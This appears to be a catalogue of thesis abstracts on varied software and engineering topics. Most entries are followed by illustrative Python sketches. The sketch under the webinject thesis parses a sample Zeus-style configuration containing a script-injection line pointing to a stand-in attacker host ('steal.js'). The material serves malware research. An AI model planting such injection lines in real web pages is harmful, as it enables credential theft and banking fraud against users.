11
Μελέτη παραμορφώσεων που προκαλούνται από τις απαιτήσεις σε υπολογιστική ισχύ σε λογισμικά ήχου / Study of distortions caused by computational-power demands in audio software
Μαλανδράκης, Στέφανος, 31 May 2012
Στην παρούσα εργασία γίνεται μελέτη ορισμένων χαρακτηριστικών παραμέτρων που αποδίδουν ένα ενδεικτικό μέτρο παραμορφώσεων για ηχητικά σήματα. Τα σήματα αυτά είναι παράγωγα διαφόρων λογισμικών ήχου που λειτουργούν σε μεταβλητές καταστάσεις υπολογιστικού φόρτου, με αποτέλεσμα να μελετάται εάν και πώς επηρεάζονται τα ηχητικά σήματα από τους παράγοντες αυτούς. Γίνεται προσπάθεια να οριστεί κατάλληλος τρόπος αξιολόγησης των λογισμικών ήχου για την περαιτέρω διερεύνηση της υποκειμενικής ηχητικής ποιότητας από κάποια υπολογιστικά συστήματα. / This thesis studies a number of characteristic parameters that provide an indicative measure of distortion for audio signals. These signals are produced by various audio software applications running under varying computational-load conditions, and the study examines whether and how the audio signals are affected by these factors. An attempt is made to define a suitable way of evaluating audio software, as a basis for further investigation of the subjective audio quality delivered by particular computing systems.
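One simple way to obtain such an indicative distortion measure is to compare the audio rendered by the software under load against a reference rendering of the same material, for example via the signal-to-noise ratio of their difference. The Python sketch below does exactly that; the choice of metric and the function names are assumptions made for illustration, since the abstract does not name the exact parameters used in the thesis.

```python
import numpy as np

def distortion_snr_db(reference, rendered):
    """Indicative distortion measure: SNR (dB) of the rendered signal's
    deviation from a time-aligned reference rendering of the same audio."""
    n = min(len(reference), len(rendered))
    ref = np.asarray(reference[:n], dtype=float)
    out = np.asarray(rendered[:n], dtype=float)
    noise_power = np.mean((out - ref) ** 2)
    if noise_power == 0:
        return float("inf")                 # bit-exact output, no distortion
    return 10.0 * np.log10(np.mean(ref ** 2) / noise_power)

if __name__ == "__main__":
    rate = 48_000
    t = np.arange(rate) / rate
    reference = np.sin(2 * np.pi * 440.0 * t)
    # Simulate an output degraded under heavy CPU load: added noise and a short dropout.
    degraded = reference + 1e-3 * np.random.randn(rate)
    degraded[10_000:10_256] = 0.0
    print(f"SNR of degraded rendering: {distortion_snr_db(reference, degraded):.1f} dB")
```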
12
Development of a Java Bytecode Front-End
Modesto, Francisco, January 2009
The VizzAnalyzer is a powerful software analysis tool. It is able to extract information from various software representations, such as source code, but also from other specifications such as UML. The extracted information serves as input to static analyses of these software projects. One programming language the VizzAnalyzer can extract information from is Java source code. Analyzing the source code is sufficient for most analyses. Sometimes, however, it is necessary to analyze compiled classes, either because the program is only available as bytecode or because the scope of the analysis includes libraries that usually exist only in binary form. Thus, being able to extract information from Java bytecode is paramount for extending some analyses, e.g., studying the dependency structure of a project and the libraries it uses. Currently, the VizzAnalyzer does not feature information extraction from Java bytecode. To allow, e.g., the analysis of the project dependency structure, we extend the VizzAnalyzer tool with a bytecode front-end that allows the extraction of information from Java bytecode. This thesis describes the design and implementation of the bytecode front-end. After implementing and integrating the new front-end with the VizzAnalyzer, we are now able to perform new analyses that work on data extracted from both source code and bytecode.
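As an illustration of the kind of information a bytecode front-end can recover, the following sketch scans the constant pool of a compiled .class file and lists the classes it references, which is the raw material for a dependency analysis. It is a minimal, hypothetical Python example and is not part of the VizzAnalyzer itself; a real front-end would presumably use a full bytecode library.

```python
import struct

def referenced_classes(path):
    """List class names referenced in the constant pool of a .class file."""
    with open(path, "rb") as f:
        data = f.read()
    magic, _minor, _major, count = struct.unpack_from(">IHHH", data, 0)
    assert magic == 0xCAFEBABE, "not a Java class file"
    offset = 10
    utf8 = {}          # constant-pool index -> decoded UTF-8 string
    class_refs = []    # name indices of CONSTANT_Class entries
    index = 1
    while index < count:
        tag = data[offset]; offset += 1
        if tag == 1:                                 # CONSTANT_Utf8: u2 length + bytes
            (length,) = struct.unpack_from(">H", data, offset)
            utf8[index] = data[offset + 2 : offset + 2 + length].decode("utf-8", "replace")
            offset += 2 + length
        elif tag == 7:                               # CONSTANT_Class: u2 name index
            (name_index,) = struct.unpack_from(">H", data, offset)
            class_refs.append(name_index); offset += 2
        elif tag == 15:                              # MethodHandle: u1 kind + u2 index
            offset += 3
        elif tag in (8, 16, 19, 20):                 # String, MethodType, Module, Package
            offset += 2
        elif tag in (3, 4, 9, 10, 11, 12, 17, 18):   # 4-byte entries
            offset += 4
        elif tag in (5, 6):                          # Long and Double take two slots
            offset += 8; index += 1
        else:
            raise ValueError(f"unknown constant-pool tag {tag}")
        index += 1
    return sorted({utf8[i].replace("/", ".") for i in class_refs if i in utf8})

if __name__ == "__main__":
    for name in referenced_classes("Example.class"):
        print(name)
```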
13
An exploration into the use of webinjects by financial malware
Forrester, Jock Ingram, January 2014
As the number of computing devices connected to the Internet increases and the Internet itself becomes more pervasive, so does the opportunity for criminals to use these devices in cybercrimes. Supporting the increase in cybercrime is the growth and maturity of the digital underground economy with strong links to its more visible and physical counterpart. The digital underground economy provides software and related services to equip the entrepreneurial cybercriminal with the appropriate skills and required tools. Financial malware, particularly the capability for injection of code into web browsers, has become one of the more profitable cybercrime tool sets due to its versatility and adaptability when targeting clients of institutions with an online presence, both in and outside of the financial industry. There are numerous families of financial malware available for use, with perhaps the most prevalent being Zeus and SpyEye. Criminals create (or purchase) and grow botnets of computing devices infected with financial malware that has been configured to attack clients of certain websites. In the research data set there are 483 configuration files containing approximately 40 000 webinjects that were captured from various financial malware botnets between October 2010 and June 2012. They were processed and analysed to determine the methods used by criminals to defraud either the user of the computing device, or the institution of which the user is a client. The configuration files contain the injection code that is executed in the web browser to create a surrogate interface, which is then used by the criminal to interact with the user and institution in order to commit fraud. Demographics on the captured data set are presented and case studies are documented based on the various methods used to defraud and bypass financial security controls across multiple industries. The case studies cover techniques used in social engineering, bypassing security controls and automated transfers.
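The webinject configuration format used by families such as Zeus and SpyEye typically pairs a target URL pattern with HTML fragments that locate the injection point and the code to insert. The sketch below is a hypothetical, simplified Python parser for such files; the block names set_url, data_before, data_inject, data_after and data_end follow the commonly documented Zeus layout, and the sample entry is invented, so the actual files in the thesis data set may differ.

```python
import re
from collections import defaultdict

BLOCKS = ("data_before", "data_inject", "data_after")

def parse_webinjects(text):
    """Parse Zeus-style webinject entries (set_url + data_* blocks) into dicts."""
    injects, current, block, buffer = [], None, None, []
    for line in text.splitlines():
        stripped = line.strip()
        if stripped.startswith("set_url"):
            parts = stripped.split()
            if len(parts) >= 2:
                current = {"url": parts[1], "flags": parts[2] if len(parts) > 2 else ""}
                injects.append(current)
        elif stripped in BLOCKS and current is not None:
            block, buffer = stripped, []
        elif stripped == "data_end" and block is not None:
            current[block] = "\n".join(buffer)
            block, buffer = None, []
        elif block is not None:
            buffer.append(line)
    return injects

def targets_by_domain(injects):
    """Group targeted URL patterns by a rough domain key (for demographics)."""
    groups = defaultdict(list)
    for inject in injects:
        key = re.sub(r"^https?://", "", inject["url"]).lstrip("*/").split("/")[0]
        groups[key or "unknown"].append(inject["url"])
    return dict(groups)

if __name__ == "__main__":
    sample = """\
set_url https://online.bank.example/login* GP
data_before
<div id="balance">
data_end
data_inject
<script src="https://attacker.example/steal.js"></script>
data_end
data_after
data_end
"""
    print(targets_by_domain(parse_webinjects(sample)))
```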
14
Posouzení informačního systému firmy a návrh změn / Information System Assessment and Proposal of ICT Modification
Horný, Miloš, January 2019
This diploma thesis assesses the information system of the Slovak Football Association using appropriate methods and evaluates the outputs to propose a more effective information system for the organisation. The thesis appraises the current state of the information system and sets the conditions for an optimised solution focused on overall improvements to the system's effectiveness and functionality.
15
RAUK: Automatic Schedulability Analysis of RTIC Applications Using Symbolic Execution
Håkansson, Mark, January 2022
In this thesis, the proof-of-concept tool RAUK for automatically analyzing RTIC applications for schedulability using symbolic execution is presented. The RTIC framework provides a declarative executable model for building embedded applications, whose behavior is based on established formal methods and policies. Because of this, RTIC applications are amenable to both worst-case execution time (WCET) and scheduling analysis techniques. Internally, RAUK utilizes the symbolic execution tool KLEE to generate test vectors covering all feasible execution paths in all user tasks in the RTIC application. Since KLEE also checks for possible program errors, e.g., arithmetic or array-indexing errors, it can be used via RAUK to verify the robustness of the application in terms of program errors. The test vectors are replayed on the target hardware to record a WCET estimation for all user tasks. These WCET measurements are used to derive a worst-case response time (WCRT) for each user task, which in turn is used to determine whether the system is schedulable using formal scheduling analysis techniques. The evaluation of this tool shows a good correlation between the results from RAUK and manual measurements of the same tasks, which demonstrates the viability of this approach. However, the current implementation can add substantial overhead to the measurements, and certain types of paths in the application can sometimes be completely absent from the analysis. The work in this thesis is based on previous research in this field on WCET estimation using KLEE with an older iteration of the RTIC framework. Our contributions include a focus on an RTIC 1.0 pre-release, seamless integration with the Rust ecosystem, minimal changes required to the application itself, and an integrated automatic schedulability analyzer. Currently, RAUK can verify simple RTIC applications for both program errors and schedulability with minimal changes to the application source code. The groundwork is laid for further improvements that are required for the tool to work on larger and more complex applications. Solutions to known problems and future work are discussed in Chapters 6 and 7, respectively.
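The schedulability check described above can be illustrated with the classical response-time analysis for fixed-priority preemptive scheduling: the worst-case response time of a task is the least fixed point of R_i = C_i + sum over higher-priority tasks j of ceil(R_i / T_j) * C_j, and the system is schedulable if every R_i stays within its deadline. The Python sketch below implements that textbook recurrence; it is assumed to be representative of the general technique RAUK builds on, not the tool's actual code or task model.

```python
import math

def response_time(tasks, i):
    """Worst-case response time of tasks[i] under fixed-priority preemptive
    scheduling; tasks are dicts with keys wcet, period, deadline, sorted by
    descending priority (index 0 = highest)."""
    c_i = tasks[i]["wcet"]
    r = c_i
    while True:
        interference = sum(
            math.ceil(r / tasks[j]["period"]) * tasks[j]["wcet"]
            for j in range(i)                      # higher-priority tasks only
        )
        r_next = c_i + interference
        if r_next == r:                            # fixed point reached
            return r
        if r_next > tasks[i]["deadline"]:          # diverged past the deadline
            return None
        r = r_next

def schedulable(tasks):
    """True iff every task's worst-case response time meets its deadline."""
    return all(
        (r := response_time(tasks, i)) is not None and r <= t["deadline"]
        for i, t in enumerate(tasks)
    )

if __name__ == "__main__":
    # Hypothetical task set; WCETs as measured (e.g., from replayed test vectors),
    # all times in microseconds.
    task_set = [
        {"wcet": 100, "period": 1_000, "deadline": 1_000},
        {"wcet": 300, "period": 5_000, "deadline": 5_000},
        {"wcet": 900, "period": 10_000, "deadline": 10_000},
    ]
    print("schedulable:", schedulable(task_set))
```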
16
Software-level analysis and optimization to mitigate the cost of write operations on non-volatile memories / Analyse logicielle et optimisation pour réduire le coût des opérations d'écriture sur les mémoires non volatiles
Bouziane, Rabab, 07 December 2018
La consommation énergétique est devenue un défi majeur dans les domaines de l'informatique embarquée et haute performance. Différentes approches ont été étudiées pour résoudre ce problème, entre autres, la gestion du système pendant son exécution, les systèmes multicœurs hétérogènes et la gestion de la consommation au niveau des périphériques. Cette étude cible les technologies de mémoire par le biais de mémoires non volatiles (NVMs) émergentes, qui présentent intrinsèquement une consommation statique quasi nulle. Cela permet de réduire la consommation énergétique statique, qui tend à devenir dominante dans les systèmes modernes. L'utilisation des NVMs dans la hiérarchie de la mémoire se fait cependant au prix d'opérations d'écriture coûteuses en termes de latence et d'énergie. Dans un premier temps, nous proposons une approche de compilation pour atténuer l'impact des opérations d'écriture lors de l'intégration de STT-RAM dans la mémoire cache. Une optimisation qui vise à réduire le nombre d'opérations d'écritures est implémentée en utilisant LLVM afin de réduire ce qu'on appelle les silent stores, c'est-à-dire les instances d'instructions d'écriture qui écrivent dans un emplacement mémoire une valeur qui s'y trouve déjà. Dans un second temps, nous proposons une approche qui s'appuie sur l'analyse des programmes pour estimer des pire temps d'exécution partiaux, dénommés δ-WCET. À partir de l'analyse des programmes, δ-WCETs sont déterminés et utilisés pour allouer en toute sécurité des données aux bancs de mémoire NVM avec des temps de rétention des données variables. L'analyse δ-WCET calcule le WCET entre deux endroits quelconques dans un programme, comme entre deux blocs de base ou deux instructions. Ensuite, les pires durées de vie des variables peuvent être déterminées et utilisées pour décider l'affectation des variables aux bancs de mémoire les plus appropriés. / Traditional memories such as SRAM, DRAM and Flash have faced critical challenges in recent years in meeting what modern computing systems require: high performance, high storage density and low power. As the number of CMOS transistors increases, leakage power consumption becomes a critical issue for energy-efficient systems. SRAM and DRAM consume too much energy and have low density, while Flash memories have limited write endurance. These technologies can therefore no longer meet the needs of either the embedded or the high-performance computing domain. Future memory systems must respect both the energy and the performance requirements. Since non-volatile memories (NVMs) appeared, many studies have shown prominent features that make such technologies a potential replacement for the conventional memories used on-chip and off-chip. NVMs have important qualities in storage density, scalability, leakage power, access performance and write endurance. Nevertheless, these new technologies still have some critical drawbacks. The main drawback is the cost of write operations in terms of latency and energy consumption. We propose a compiler-level optimization that reduces the number of write operations by eliminating the execution of redundant stores, called silent stores. A store is silent if it writes to a memory address the same value that is already stored at that address. The LLVM-based optimization identifies the silent stores in a program and eliminates them by not executing them.
Furthermore, the cost of a write operation depends strongly on the NVM technology used and on its degree of non-volatility, called the retention time: when the retention time is long, the latency and energy cost of a write operation are considerably higher, and vice versa. Based on this, we propose an approach applicable to a multi-bank NVM in which each bank is designed with a specific retention time. We analyse a program and compute the worst-case lifetime of a store instruction in order to allocate data to the most appropriate NVM bank.
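To make the silent-store idea concrete, the following sketch models the transformation in spirit: a store is skipped whenever the value to be written is already in place, trading a cheap read for an avoided expensive NVM write. This is an illustrative Python run-time model with an invented memory class and synthetic trace; the thesis performs the equivalent elimination statically, as an LLVM compiler pass, rather than at run time as shown here.

```python
class NVMBank:
    """Toy memory model that counts writes; used to show the effect of
    skipping silent stores (stores that rewrite the value already present)."""

    def __init__(self):
        self.cells = {}
        self.writes = 0
        self.reads = 0

    def store(self, addr, value, skip_silent=False):
        if skip_silent:
            self.reads += 1                 # extra read to test for silence
            if self.cells.get(addr) == value:
                return                      # silent store: skip the costly write
        self.cells[addr] = value
        self.writes += 1

def run(trace, skip_silent):
    bank = NVMBank()
    for addr, value in trace:
        bank.store(addr, value, skip_silent)
    return bank.writes

if __name__ == "__main__":
    # A synthetic trace in which half of the stores rewrite an existing value.
    trace = [(i % 4, 42) for i in range(8)] + [(i % 4, i) for i in range(8)]
    print("writes without elimination:", run(trace, skip_silent=False))
    print("writes with elimination:   ", run(trace, skip_silent=True))
```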
17
Visualization techniques for the analysis of software behavior and related structures
Trümper, Jonas, January 2014
Software maintenance encompasses any changes made to a software system after its initial deployment and is thereby one of the key phases in the typical software-engineering lifecycle. In software maintenance, we primarily need to understand structural and behavioral aspects, which are difficult to obtain, e.g., by code reading. Software analysis is therefore a vital tool for maintaining these systems: it provides the - preferably automated - means to extract and evaluate information from their artifacts, such as software structure, runtime behavior, and related processes.
However, such analysis typically results in massive raw data, so that even experienced engineers face difficulties directly examining, assessing, and understanding these data. Among other things, they require tools with which to explore the data if no clear question can be formulated beforehand. For this, software analysis and visualization provide their users with powerful interactive means. These enable the automation of tasks and, particularly, the acquisition of valuable and actionable insights into the raw data. For instance, one means of exploring runtime behavior is trace visualization.
This thesis aims at extending and improving the tool set for visual software analysis by concentrating on several open challenges in the fields of dynamic and static analysis of software systems. This work develops a series of concepts and tools for the exploratory visualization of the respective data to support users in finding and retrieving information on the system artifacts concerned. This is a difficult task, due to the lack of appropriate visualization metaphors; in particular, the visualization of complex runtime behavior poses various questions and challenges of both a technical and conceptual nature.
This work focuses on a set of visualization techniques for visually representing control-flow related aspects of software traces from shared-memory software systems: A trace-visualization concept based on icicle plots aids in understanding both single-threaded as well as multi-threaded runtime behavior on the function level. The concept’s extensibility further allows the visualization and analysis of specific aspects of multi-threading such as synchronization, the correlation of such traces with data from static software analysis, and a comparison between traces. Moreover, complementary techniques for simultaneously analyzing system structures and the evolution of related attributes are proposed. These aim at facilitating long-term planning of software architecture and supporting management decisions in software projects by extensions to the circular-bundle-view technique: An extension to 3-dimensional space allows for the use of additional variables simultaneously; interaction techniques allow for the modification of structures in a visual manner.
The concepts and techniques presented here are generic and, as such, can be applied beyond software analysis for the visualization of similarly structured data. The techniques' practicability is demonstrated by several qualitative studies using subject data from industry-scale software systems. The studies provide initial evidence that the techniques' application yields useful insights into the subject data and its interrelationships in several scenarios. / Die Softwarewartung umfasst alle Änderungen an einem Softwaresystem nach dessen initialer Bereitstellung und stellt damit eine der wesentlichen Phasen im typischen Softwarelebenszyklus dar. In der Softwarewartung müssen wir insbesondere strukturelle und verhaltensbezogene Aspekte verstehen, welche z.B. alleine durch Lesen von Quelltext schwer herzuleiten sind. Die Softwareanalyse ist daher ein unverzichtbares Werkzeug zur Wartung solcher Systeme: Sie bietet - vorzugsweise automatisierte - Mittel, um Informationen über deren Artefakte, wie Softwarestruktur, Laufzeitverhalten und verwandte Prozesse, zu extrahieren und zu evaluieren.
Eine solche Analyse resultiert jedoch typischerweise in großen und größten Rohdaten, die selbst erfahrene Softwareingenieure direkt nur schwer untersuchen, bewerten und verstehen können. Unter Anderem dann, wenn vorab keine klare Frage formulierbar ist, benötigen sie Werkzeuge, um diese Daten zu erforschen. Hierfür bietet die Softwareanalyse und Visualisierung ihren Nutzern leistungsstarke, interaktive Mittel. Diese ermöglichen es Aufgaben zu automatisieren und insbesondere wertvolle und belastbare Einsichten aus den Rohdaten zu erlangen. Beispielsweise ist die Visualisierung von Software-Traces ein Mittel, um das Laufzeitverhalten eines Systems zu ergründen.
Diese Arbeit zielt darauf ab, den "Werkzeugkasten" der visuellen Softwareanalyse zu erweitern und zu verbessern, indem sie sich auf bestimmte, offene Herausforderungen in den Bereichen der dynamischen und statischen Analyse von Softwaresystemen konzentriert. Die Arbeit entwickelt eine Reihe von Konzepten und Werkzeugen für die explorative Visualisierung der entsprechenden Daten, um Nutzer darin zu unterstützen, Informationen über betroffene Systemartefakte zu lokalisieren und zu verstehen. Da es insbesondere an geeigneten Visualisierungsmetaphern mangelt, ist dies eine schwierige Aufgabe. Es bestehen, insbesondere bei komplexen Softwaresystemen, verschiedenste offene technische sowie konzeptionelle Fragestellungen und Herausforderungen.
Diese Arbeit konzentriert sich auf Techniken zur visuellen Darstellung kontrollflussbezogener Aspekte aus Software-Traces von Shared-Memory Softwaresystemen: Ein Trace-Visualisierungskonzept, basierend auf Icicle Plots, unterstützt das Verstehen von single- und multi-threaded Laufzeitverhalten auf Funktionsebene. Die Erweiterbarkeit des Konzepts ermöglicht es zudem spezifische Aspekte des Multi-Threading, wie Synchronisation, zu visualisieren und zu analysieren, derartige Traces mit Daten aus der statischen Softwareanalyse zu korrelieren sowie Traces mit einander zu vergleichen. Darüber hinaus werden komplementäre Techniken für die kombinierte Analyse von Systemstrukturen und der Evolution zugehöriger Eigenschaften vorgestellt. Diese zielen darauf ab, die Langzeitplanung von Softwarearchitekturen und Management-Entscheidungen in Softwareprojekten mittels Erweiterungen an der Circular-Bundle-View-Technik zu unterstützen: Eine Erweiterung auf den 3-dimensionalen Raum ermöglicht es zusätzliche visuelle Variablen zu nutzen; Strukturen können mithilfe von Interaktionstechniken visuell bearbeitet werden.
Die gezeigten Techniken und Konzepte sind allgemein verwendbar und lassen sich daher auch jenseits der Softwareanalyse einsetzen, um ähnlich strukturierte Daten zu visualisieren. Mehrere qualitative Studien an Softwaresystemen in industriellem Maßstab stellen die Praktikabilität der Techniken dar. Die Ergebnisse sind erste Belege dafür, dass die Anwendung der Techniken in verschiedenen Szenarien nützliche Einsichten in die untersuchten Daten und deren Zusammenhänge liefert.
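For readers unfamiliar with icicle plots, the following sketch shows the core layout idea behind the trace-visualization concept described above: each function call in a trace becomes a rectangle whose horizontal extent spans its execution interval and whose call-stack depth determines its row. This is a hypothetical Python illustration of the general layout algorithm, with an invented event format, not code from the thesis prototype.

```python
def icicle_layout(events):
    """Turn a sequence of ('enter'|'exit', function, timestamp) trace events
    into icicle-plot rectangles (function, x=start, width=duration, row=depth)."""
    stack, rects = [], []
    for kind, function, time in events:
        if kind == "enter":
            stack.append((function, time))
        elif kind == "exit":
            name, start = stack.pop()
            assert name == function, "malformed trace: unbalanced enter/exit"
            rects.append({"function": name, "x": start,
                          "width": time - start, "row": len(stack)})
    return rects

if __name__ == "__main__":
    trace = [
        ("enter", "main", 0), ("enter", "parse", 1), ("exit", "parse", 4),
        ("enter", "render", 4), ("enter", "draw", 5), ("exit", "draw", 8),
        ("exit", "render", 9), ("exit", "main", 10),
    ]
    for rect in sorted(icicle_layout(trace), key=lambda r: (r["row"], r["x"])):
        print(rect)
```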
18
Success factors of a winning organisation, measured at Rubico (Pty) Ltd
Lubbe, C. R., 03 1900
Study project (MBA)--University of Stellenbosch, 2003. / ENGLISH ABSTRACT: South Africa is a land of contrasts - contrasts in its landscape, cultures and business.
Highly successful organisations exist in South Africa. The less fortunate
organisations can learn a lot from them and other successful international
organisations. Business has become a highly sophisticated science and although a
recipe for instant success does not exist, the criteria described in this study can
enhance an organisation's chances for success considerably.
The first section of the study focuses on a literature study of nine critical factors
identified in successful organisations. The study covers: Vision, Map, Customer
Focus, Confidence, Standards, Drive, Teamwork, Support and Belonging. The
establishment and development of these critical factors within an organisation are
fundamental in highly successful organisations. The study defines and develops
these factors into practical and understandable criteria to be used and measured in
an organisation. It further uses the criteria to show where an organisation could be
failing and highlights some common mistakes that can be avoided. The study also
provides business models to develop these criteria.
The second section of the study focuses on an internal survey done at Rubico (Pty)
Ltd, to measure the criteria explained in the first section. The survey highlights areas
where Rubico (Pty) Ltd is functioning well, but also identifies shortcomings. The
survey can be used as a measuring tool to provide insight into areas where an
organisation is lacking and give the user the ability to manage more effectively. / AFRIKAANSE OPSOMMING: Suid-Afrika is 'n land van kontraste - kontraste in die landskap, kulture en
sakewêreld. Daar bestaan baie suksesvolle organisasies in Suid-Afrika. Minder
suksesvolle organisasies kan baie leer by hierdie en ander suksesvolle
internasionale organisasies. Besigheid het verander in 'n hoogs gesofistikeerde
wetenskap en hoewel daar geen resep bestaan vir oornagsukses nie, kan die kriteria
wat beskryf word in hierdie studie 'n organisasie se kanse op sukses verbeter.
Die eerste deel van die studie fokus op 'n literatuurstudie oor nege kritiese faktore
wat in suksesvolle organisasies geïdentifiseer is. Die studie spreek die volgende aan:
visie, strategie, verbruiker fokus, vertroue, standaarde, dryfkrag, spanwerk,
ondersteuning en "belonging". Die daarstelling en ontwikkeling van hierdie faktore
binne die organisasie is fundamenteel in hoogs suksesvolle organisasies. Die studie
definiëer en ontwikkel hierdie faktore in praktiese en verstaanbare kriteria wat
gebruik en gemeet kan word binne 'n organisasie. Verder gebruik die studie hierdie
kriteria om aan te dui waar 'n organisasie nie slaag nie en om algemene foute wat
vermy kan word, uit te wys. Die studie voorsien ook sakemodelle om die kriteria te
onwikkel.
Die tweede deel van die studie fokus op 'n interne opname wat in Rubico (Pty) Ltd
geloods is, om die kriteria wat in die eerste deel verduidelik is, te meet. Die opname
beklemtoon areas waar Rubico (Pty) Ltd suksesvol is, maar identifiseer ook leemtes.
Die opname kan gebruik word as 'n meetinstrument om insig oor tekortkominge in
die organisasie te bekom en die gebruiker daarvan toe te rus vir effektiewe bestuur.
19
Návrh subsystému CRM firemního informačního systému / Design of information system CRM module
Honajzer, Martin, January 2008
The aim of this work is to analyze and design a model, fully prepared for the development team, from which a fully functional CRM module can be built for a company offering computer training. Using UML diagrams, it describes the functions offered by the module and the way in which these functions are made accessible to the user. The work also suggests how the module can interact with the database through SQL.
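As a rough illustration of the database side of such a module, the sketch below builds a minimal relational schema for a training company's CRM in Python with sqlite3. The table and column names are invented for this example and are not taken from the thesis design.

```python
import sqlite3

# Hypothetical minimal schema for a training-company CRM module.
SCHEMA = """
CREATE TABLE customer (
    id    INTEGER PRIMARY KEY,
    name  TEXT NOT NULL,
    email TEXT UNIQUE
);
CREATE TABLE course (
    id    INTEGER PRIMARY KEY,
    title TEXT NOT NULL,
    price REAL NOT NULL
);
CREATE TABLE enrollment (
    customer_id INTEGER NOT NULL REFERENCES customer(id),
    course_id   INTEGER NOT NULL REFERENCES course(id),
    enrolled_on TEXT DEFAULT CURRENT_DATE,
    PRIMARY KEY (customer_id, course_id)
);
"""

def demo():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.execute("INSERT INTO customer (name, email) VALUES (?, ?)",
                 ("Jana Novakova", "jana@example.com"))
    conn.execute("INSERT INTO course (title, price) VALUES (?, ?)",
                 ("Introduction to SQL", 120.0))
    conn.execute("INSERT INTO enrollment (customer_id, course_id) VALUES (1, 1)")
    # List customers together with the courses they are enrolled in.
    rows = conn.execute("""
        SELECT customer.name, course.title
        FROM enrollment
        JOIN customer ON customer.id = enrollment.customer_id
        JOIN course   ON course.id   = enrollment.course_id
    """).fetchall()
    for name, title in rows:
        print(f"{name} -> {title}")

if __name__ == "__main__":
    demo()
```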
20
Metodologia de aquisição de dados e análise por software, para sistemas de coincidências 4πβ-γ e sua aplicação na padronização de radionuclídeos, com ênfase em transições metaestáveis / Data acquisition with software analysis methodology for 4πβ-γ coincidence systems and application in radionuclide standardization, with emphasis on metastable transitions
Brancaccio, Franco, 06 August 2013
O Laboratório de Metrologia Nuclear (LMN) do Instituto de Pesquisas Energéticas e Nucleares (IPEN) desenvolveu recentemente o Sistema de Coincidência por Software (SCS), para a digitalização e registro dos sinais de seus sistemas de coincidências 4πβ-γ utilizados na padronização de radionuclídeos. O sistema SCS possui quatro entradas analógicas independentes que possibilitam o registro simultâneo dos sinais de até quatro detectores (vias β e γ). A análise dos dados é realizada a posteriori, por software, incluindo discriminação de amplitudes, simulação do tempo-morto da medida e definição do tempo de resolução de coincidências. O software então instalado junto ao SCS estabeleceu a metodologia básica de análise, aplicável a radionuclídeos com decaimento simples, como o 60Co. O presente trabalho amplia a metodologia de análise de dados obtidos com o SCS, de modo a possibilitar o uso de detectores com alta resolução em energia (HPGe), para padronização de radionuclídeos com decaimentos mais complexos, com diferentes ramos de decaimento ou com transições metaestáveis. A expansão metodológica tem suporte na elaboração do programa de análise denominado Coincidence Analyzing Task (CAT). A seção de aplicação inclui as padronizações do 152Eu (diferentes ramos de decaimento) e do 67Ga (nível metaestável). A padronização do 152Eu utilizou uma amostra de uma comparação internacional promovida pelo BIPM (Bureau International des Poids et Mesures), podendo-se comparar a atividade obtida com os valores de laboratórios mundialmente reconhecidos, de modo a avaliar e validar a metodologia desenvolvida. Para o 67Ga, foram obtidas: a meia-vida do nível metaestável de 93 keV, por três diferentes técnicas de análise do conjunto de dados (βpronto-γatrasado-HPGe, βpronto-γatrasado-NaI e βpronto-βatrasado); as atividades de cinco amostras, normalizadas por Monte Carlo e as probabilidades de emissão gama por decaimento, para nove transições. / The Nuclear Metrology Laboratory (LMN) at the Nuclear and Energy Research Institute (IPEN São Paulo, Brazil) has recently developed the Software Coincidence System (SCS) for the digitalization and recording of signals from its 4πβ-γ detection systems. SCS features up to four independent analog inputs, enabling the simultaneous recording of up to four detectors (β and γ). The analysis task is performed a posteriori, by means of specialized software, including the setting of energy discrimination levels, dead time and coincidence resolution time. The software initially installed was able to perform a basic analysis, for the standardization of simple-decay radionuclides such as 60Co. The present work improves the SCS analysis methodology in order to enable the use of high-resolution detectors (HPGe) for the standardization of complex-decay radionuclides, including metastable transitions or different decay branches. A program called Coincidence Analyzing Task (CAT) was implemented for the data processing. The work also includes an application section, where the standardization results of 152Eu (different decay branches) and 67Ga (with a metastable level) are presented. The 152Eu standardization was considered for the methodology validation, since it was accomplished by the measurement of a sample previously standardized in an international comparison sponsored by the BIPM (Bureau International des Poids et Mesures). The activity value obtained in this work, as well as its accuracy, could be compared to those obtained by leading laboratories around the world.
The 67Ga standardization includes the measurement of five samples, with activity values normalized by Monte Carlo simulation. The half-life of the 93 keV metastable level and the gamma-emission probabilities per decay for nine transitions of 67Ga are also presented. The metastable half-life was obtained by three different methods: βprompt-γdelayed-HPGe, βprompt-γdelayed-NaI and βprompt-βdelayed.
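The 4πβ-γ coincidence method underlying the SCS rests on a simple relation: with a β-channel count rate Nβ, a γ-channel count rate Nγ and a coincidence rate Nc, the source activity is approximately N0 = Nβ·Nγ/Nc when efficiency-dependent corrections, background and dead time are neglected. The Python sketch below applies this textbook relation to invented numbers; it is a hedged simplification and not the CAT analysis code, which handles amplitude discrimination, dead-time simulation and efficiency extrapolation in full.

```python
def coincidence_activity(n_beta, n_gamma, n_coinc):
    """Ideal 4πβ-γ coincidence estimate of source activity (decays per second):
    N0 = Nβ·Nγ/Nc, valid only when efficiency corrections, background and
    dead time are neglected."""
    if n_coinc <= 0:
        raise ValueError("coincidence rate must be positive")
    return n_beta * n_gamma / n_coinc

def beta_efficiency(n_coinc, n_gamma):
    """Apparent β-detection efficiency, Nc/Nγ, the quantity varied in
    efficiency-extrapolation measurements."""
    return n_coinc / n_gamma

if __name__ == "__main__":
    # Illustrative count rates in counts per second (not thesis data).
    n_beta, n_gamma, n_coinc = 1520.0, 830.0, 610.0
    activity = coincidence_activity(n_beta, n_gamma, n_coinc)
    print(f"estimated activity: {activity:.1f} Bq "
          f"(beta efficiency ~ {beta_efficiency(n_coinc, n_gamma):.2f})")
```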